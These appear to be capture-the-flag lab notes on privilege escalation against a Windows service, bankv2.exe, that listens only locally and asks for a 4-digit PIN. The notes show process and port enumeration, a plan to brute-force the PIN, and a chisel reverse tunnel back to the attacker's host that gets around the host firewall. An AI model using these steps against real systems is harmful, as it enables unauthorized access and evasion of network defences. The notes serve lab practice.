5 privesc bankv2.exe
# bankv2.exe is a running process; look up its PID
C:\Users\Public>tasklist | find "bankv2.exe"
tasklist | find "bankv2.exe"
bankv2.exe 1608 0 132 K
# PID=1608
C:\Users\Public>netstat -anop tcp | find "1608"
netstat -anop tcp | find "1608"
TCP 0.0.0.0:910 0.0.0.0:0 LISTENING 1608
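# cannot connect to port 910 from Kali, although it listens on 0.0.0.0 (presumably filtered by the host firewall)
# transferred nc to the target; connecting locally works, so the filter is the only thing protecting this service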
C:\Users\Public>nc -vn 127.0.0.1 910
nc -vn 127.0.0.1 910
(UNKNOWN) [127.0.0.1] 910 (?) open
--------------------------------------------------------------
Internet E-Coin Transfer System
International Bank of Sun church
v0.1 by Gio & Cneeliz
--------------------------------------------------------------
Please enter your super secret 4 digit PIN code to login:
[$] 6969
[!] Access denied, disconnecting client....
too many output retries: CONNABORTED
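# it's a 4-digit PIN: only 10,000 possible values, so it can be brute-forced unless the service rate-limits or locks out failed attempts
# the port is only reachable locally, so use port forwarding (chisel reverse tunnel)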
# server (on Kali)
$ chisel server -p 8000 --reverse
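# client (on the target); R:910:127.0.0.1:910 exposes the target's local port 910 as port 910 on the chisel server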
C:\Users\Public>chisel.exe client 10.10.16.7:8000 R:910:127.0.0.1:910
chisel.exe client 10.10.16.7:8000 R:910:127.0.0.1:910
2021/10/01 00:50:36 client: Connecting to ws://10.10.16.7:8000
2021/10/01 00:50:37 client: Connected (Latency 70.632ms)